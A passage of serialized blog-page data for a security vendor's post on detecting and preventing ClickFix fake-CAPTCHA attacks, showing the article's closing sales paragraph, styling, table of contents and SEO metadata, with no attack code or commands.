Introduce it through controlled pilot rings.",[1193,1669,1671],{"id":1670},"where-we-come-in","Where we come in",[817,1673,1199],{},[817,1675,1676,1677,1681],{},"ClickFix moves fast, and Microsoft's native detections cover most of it but not all. For our CSOC customers we continuously extend coverage where gaps appear: Windows Terminal execution, RAT-driven support scams, and post-compromise behavior. If you want to know where your environment stands, ",[1678,1679,1680],"a",{"href":428},"get in touch",".",[1683,1684,1685],"style",{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":821,"searchDepth":822,"depth":822,"links":1687},[1688,1689,1690,1691,1692,1693,1694,1695,1696],{"id":1195,"depth":822,"text":1196},{"id":1277,"depth":822,"text":1278},{"id":1289,"depth":822,"text":1290},{"id":1312,"depth":822,"text":1313},{"id":1425,"depth":822,"text":1426},{"id":1455,"depth":822,"text":1456},{"id":1492,"depth":822,"text":1493},{"id":1504,"depth":822,"text":1505},{"id":1670,"depth":822,"text":1671},"post",{"lang":1699,"seoTitle":1700,"titleClass":1701,"date":1702,"categories":1703,"blogtitlepic":1704,"socialimg":1705,"customExcerpt":1706,"keywords":1707,"hreflang":1708,"asideNav":1716,"published":521,"maxContent":521},"en","ClickFix Attacks: How to Detect and Prevent the Win+R Paste Trick","h2-font-size","2026-09-21",[373],"head-clickfix.jpg","/blog/heads/head-clickfix.jpg","ClickFix turns users into their own attacker: a fake CAPTCHA, a copy-paste, and malware runs in memory with nothing on disk to scan. How Microsoft Defender detects the attack, where it falls short, and how to close the gap with a RunMRU hunt and four layers of prevention.","ClickFix, ClickFix attack, ClickFix detection, ClickFix prevention, fake CAPTCHA, Win+R attack, RunMRU KQL, Microsoft Defender, Attack Surface Reduction, ASR rules, App Control for Business, WDAC, Constrained Language Mode, Network Protection, AMSI, Endpoint Privilege Management, infostealer, LOLBin, PowerShell hardening",[1709,1711,1713],{"lang":4,"href":1710},"/de/posts/2026-09-21-clickfix-prevent-detect",{"lang":1699,"href":1712},"/en/posts/2026-09-21-clickfix-prevent-detect",{"lang":1714,"href":1715},"es","/es/posts/2026-09-21-clickfix-prevent-detect",{"menuItems":1717},[1718,1721,1724,1727,1730,1733,1736,1739,1742],{"href":1719,"text":1720},"#the-clickfix-attack-chain","The attack chain",{"href":1722,"text":1723},"#what-microsoft-defender-detects","What Defender detects",{"href":1725,"text":1726},"#where-the-native-detection-falls-short","Where it falls short",{"href":1728,"text":1729},"#closing-the-gap-a-runmru-hunt","Closing the gap",{"href":1731,"text":1732},"#prevention-layer-1-block-the-delivery","Layer 1: Delivery",{"href":1734,"text":1735},"#prevention-layer-2-block-the-trick","Layer 2: The trick",{"href":1737,"text":1738},"#prevention-layer-3-block-the-action","Layer 3: The action",{"href":1740,"text":1741},"#prevention-layer-4-block-the-execution","Layer 4: Execution",{"href":1743,"text":1671},"#where-we-come-in","/posts/2026-09-21-clickfix-prevent-detect",{"title":1188,"description":821},"posts/2026-09-21-clickfix-prevent-detect",[1748,1749,1750],"Defender","SOC","Endpoint Security","0_LVIYCM84g_XuJ0sDqkycaBoHunTQJkZFcQwohf_b8",[],1790017938480]